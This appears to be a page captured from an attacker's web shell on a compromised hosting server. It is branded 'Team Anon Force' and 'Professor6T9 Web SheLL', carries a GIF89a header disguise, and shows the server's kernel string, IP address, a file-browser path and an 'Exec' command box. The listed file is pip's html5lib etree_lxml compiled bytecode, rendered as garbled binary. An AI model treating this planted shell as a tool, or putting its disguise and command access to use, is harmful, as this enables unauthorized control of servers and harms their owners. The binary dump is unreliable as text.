GIF89;aGIF89;aGIF89;a
Team Anon Force
https://t.me/Professor6T9x
Professor6T9 Web SheLL
Linux server326.web-hosting.com 4.18.0-513.18.1.lve.el8.x86_64 #1 SMP Thu Feb 22 12:55:50 UTC 2024 x86_64
LiteSpeed
67.223.118.122
/
usr
/
lib
/
python3.8
/
site-packages
/
pip
/
_vendor
/
html5lib
/
treebuilders
/
__pycache__
[ HOME ]
Exec
Submit
etree_lxml.cpython-38.pyc
U ��.e*7 � @ s� d Z ddlmZmZmZ ddlZddlZddlZddlm Z ddl mZ ddlm Z dd lmZ dd lmZ ddlmZ dZe�d�Ze�d �jZG dd� de�ZG dd� de�Zdd� Zdd� ZG dd� de j�ZdS )a� Module for supporting the lxml.etree library. The idea here is to use as much of the native library as possible, without using fragile hacks like custom element names that break between releases. The downside of this is that we cannot represent all possible trees; specifically the following are known to cause problems: Text or comments as siblings of the root element Docypes with no name When any of these things occur, we emit a DataLossWarning � )�absolute_import�division�unicode_literalsN� )�base� )�DataLossWarning)� constants)�etree)� _ihatexmlTz {([^}]*)}(.*)Zasdc @ s e Zd Zdd� ZdS )�DocumentTypec C s || _ || _|| _d S �N)�name�publicId�systemId)�selfr r r � r �P/usr/lib/python3.8/site-packages/pip/_vendor/html5lib/treebuilders/etree_lxml.py�__init__# s zDocumentType.__init__N)�__name__� __module__�__qualname__r r r r r r "